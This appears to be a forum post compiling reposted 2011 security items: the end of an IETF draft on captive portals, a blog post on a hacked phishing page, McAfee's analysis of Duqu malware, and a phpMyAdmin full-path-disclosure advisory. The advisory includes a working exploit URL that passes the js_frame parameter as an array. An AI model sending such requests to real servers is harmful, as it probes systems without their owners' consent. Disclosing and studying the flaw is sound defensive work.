Daboo, C., Desruisseaux, B., and L. Dusseault, "Calendaring Extensions to WebDAV (CalDAV)", RFC 4791, March 2007. [RFC4918] Dusseault, L., "HTTP Extensions for Web Distributed Authoring and Versioning (WebDAV)", RFC 4918, June 2007. Appendix A. Acknowledgements Thanks to Jan Algermissen for his suggestions and feedback. The authors take all responsibility for errors and omissions. Appendix B. Issues Raised by Captive Portals Since clients cannot differentiate between a portal's response and that of the HTTP server that they intended to communicate with, a number of issues arise. One example is the "favicon.ico" <http://en.wikipedia.org/wiki/Favicon> commonly used by browsers to identify the site being accessed. If the favicon for a given site is fetched from a captive portal instead of the intended site (e.g., because the user is unauthenticated), it will often "stick" in the browser's cache (most implementations cache favicons aggressively) beyond the portal session, so that it seems as if the portal's favicon has "taken over" the legitimate site. Another browser-based issue comes about when P3P <http://www.w3.org/TR/P3P/> is supported. Depending on how it is implemented, it's possible a browser might interpret a portal's response for the p3p.xml file as the server's, resulting in the privacy policy (or lack thereof) advertised by the portal being interpreted as applying to the intended site. Other Web-based protocols such as WebFinger <http://code.google.com/p/webfinger/wiki/WebFingerProtocol>, CORS <http://www.w3.org/TR/cors/> and OAuth <http://tools.ietf.org/html/draft-ietf-oauth-v2> may also be vulnerable to such issues. Although HTTP is most widely used with Web browsers, a growing number of non-browsing applications use it as a substrate protocol. For example, WebDAV [RFC4918] and CalDAV [RFC4791] both use HTTP as the basis (for network filesystem access and calendaring, respectively). Nottingham & Fielding Expires April 20, 2012 [Page 8] Internet-Draft Additional HTTP Status Codes October 2011 Using these applications from behind a captive portal can result in spurious errors being presented to the user, and might result in content corruption, in extreme cases. Similarly, other non-browser applications using HTTP can be affected as well; e.g., widgets <http://www.w3.org/TR/widgets/>, software updates, and other specialised software such as Twitter clients and the iTunes Music Store. It should be noted that it's sometimes believed that using HTTP redirection to direct traffic to the portal addresses these issues. However, since many of these uses "follow" redirects, this is not a good solution. Authors' Addresses Mark Nottingham Rackspace Email: mnot@mnot.net URI: http://www.mnot.net/ Roy T. Fielding Adobe Systems Incorporated 345 Park Ave San Jose, CA 95110 USA Email: fielding@gbiv.com URI: http://roy.gbiv.com/ Nottingham & Fielding Expires April 20, 2012 [Page 9] Html markup produced by rfcmarkup 1.97, available from http://tools.ietf.org/tools/rfcmarkup/ Sursa: draft-nottingham-http-new-status-02 - Additional HTTP Status Codes

Phishing page hacked, turned into PSA on the dangers of phishing THURSDAY, OCTOBER 20, 2011 Here's something you don't see very often. Someone - perhaps the recipient of the below phishing mail while having a Falling Down style day at the office - decided enough was enough and set out to hijack the phishing site they were sent to. This is the email that started it all: "You have exceeded the storage limit on your mailbox.You will not be able to send or receive new mail until you upgrade your email. Click the below link and fill the form to upgrade your account. System Administrator" Clicking the link would have taken you to the below phishing form that asks for Username, Password and Email address (along with password verification). Now? Well, it looks a little bit different: The original boxes are gone, replaced by the following message : "There is no such thing as a central email service update a stupid criminal created this to steal your email account I have modified it to educate you about online crime he does not like that but that is too damn bad you can submit this form to see a helpful video about phishing stop letting stupid criminals like this one hijack your account have a great day" Hitting the submit button takes you to a warning video about Phishing scams on CNET. There's no indication left as to how the person now in control of the site obtained the login credentials. Phishing the phisher, perhaps? It does happen from time to time... Author: Christopher Boyd (Thanks to Robert and Wendy for this one) Sursa: GFI LABS Blog: Phishing page hacked, turned into PSA on the dangers of phishing Like!

The Day of the Golden Jackal - The Next Tale in the Stuxnet Files: Duqu Tuesday, October 18, 2011 at 10:49am by Guilherme Venere and Peter Szor Stuxnet was possibly the most complex attack of this decade, and we expected that similar attacks would appear in the near future. One thing for sure is that the Stuxnet team is still active–as recent evidence has revealed. McAfee Labs received a kit from an independent team of researchers that is closely related to the original Stuxnet worm, but with a different goal–to be used for espionage and targeted attacks against sites such as Certificate Authorities (CAs). How do we know it was the Stuxnet team? To start with, the attacks are targeting CAs in regions occupied by “Canis Aureus,” the Golden Jackal, to execute professional targeted attacks, against sites such as CAs. The Stuxnet worm utilized two “stolen” digital certificates belonging to two companies from Taiwan that operated in the same business district. Yet, the Stuxnet-related code, named Duqu, which McAfee Labs received as part of an on-going investigation, was signed with yet another key belonging to the company C-Media Electronics, in Taipei. It is highly likely that this key, just like the previous two known cases, was not really stolen from the actual companies, but instead directly generated in the name of such companies at a CA as part of a direct attack. The threat that we call Duqu is based on Stuxnet and is very similar. Only a few sites so far are known to have been attacked by the code, and it does not have PLC functionality like Stuxnet. Instead, the code, delivered via exploitation, installs drivers and encrypted DLLs that function very similarly to the original Stuxnet code. In fact, the new driver’s code used for the injection attack is very similar to Stuxnet, as are several encryption keys and techniques that were used in Stuxnet. Duqu is very time sensitive, and is controlled by an extended, encrypted configuration file. It communicates with a command server in India. This IP address has since been blacklisted at the ISP and no longer functions. Yet it was specially crafted to execute sophisticated attacks against key targets and has remote control functionality to install new code on the target. These include keyloggers, which can monitor all actions on systems: running processes, window messages, and so on. Furthermore, the keylogger component also contains functionality to hide files with a user-mode rootkit. The file names of the SYS drivers can be cmi4432.sys and jminet7.sys. They relate to two groups of files that have similar functionality. A third file implements the keylogging functions. McAfee detects the packages as PWS-Duqu, PWS-Duqu.dr, and PWS-Duqu!rootkit. Both SYS files have almost the exact same code, with a few differences. The main difference is the fact that one of them is digitally signed with a certificate belonging to C-Media, while the other is not. Here is an example of the certificate that seemingly belongs to C-Media: Since the discovery of this malware, the certificate above has been revoked by VeriSign as we can see in the image below: Certificate revoked by VeriSign The purpose of the SYS file seems to be only to decrypt and execute the primary payload DLL. Each SYS file works with a different set of files that in turn generate different DLLs. The graph below shows the connections found between the samples so far: File relationships for PWS-Duqu As we can see above, the method used by both SYS files is very similar. The PNF file is an encrypted DLL that is decrypted and injected into arbitrary system processes. This DLL in turn decrypts another DLL that contains the malicious code used to hide the presence of the malware in memory. Both groups above also contain another module, sortXXXX.nls (where XXXX can be any hexadecimal character), shown in red above. It seems to be responsible for the malware’s malicious activities, such as command and control communications. The keylogger module works a little differently from the SYS files, but it also uses a module with the same name as the other components. This file is hidden using the same method as the other modules. Although the files are different, both rootkits work more or less in the same way. Another relationship among the keylogger and the other two modules is that each uses the same decryption key for the strings stored in its data section. The strings indicate these modules have the capability to disable security tools, targeting some specific antivirus products. McAfee Labs advises Certificate Authorities to carefully verify if their systems might have been affected by this threat or any variations. As we publish this blog, McAfee Labs has also identified a likely variation of this attack at another site. McAfee Labs would like to thank the independent team working on the investigation of this case and their contributions to our research. Sursa: https://blogs.mcafee.com/mcafee-labs/the-day-of-the-golden-jackal-%E2%80%93-further-tales-of-the-stuxnet-files

phpMyAdmin 3.4.5 – Full path disclosure in phpmyadmin.css.php phpMyAdmin 3.4.5 suffers of insufficient input validation of the parameter js_frame in phpmyadmin.css.php, exposing information that could be used in further attacks. CVE Entry: CVE-2011-3646 CWE: CWE-20, CWE-200 PMASA ENTRY: PMASA-2011-15 ========= Description The script returns an error message, containing the full path if the js_frame parameter is defined as an array. ========= Exploit No authentication needed to exploit this vulnerability. http://example.com/path_to_phpmyadmin/phpmyadmin.css.php?js_frame[]=right ========= Official fix http://phpmyadmin.git.sourceforge.net/git/gitweb.cgi?p=phpmyadmin/phpmyadmin;a=commitdiff;h=d35cba980893aa6e6455fd6e6f14f3e3f1204c52 ========= Credits Discovered by Mihail Ursu ( http://securitate.md/ ) on 12 Sep 2011. ========= Disclosure Timeline Reported to vendor on 12 Sep 2011. Confirmation from vendor 21 Sep 2011. Patch confirmation 4 Oct 2011. Official fix and public disclosure 17 Oct 2011. Sursa: http://seclists.org/fulldisclosure/2011/Oct/690 Poate fi foarte util.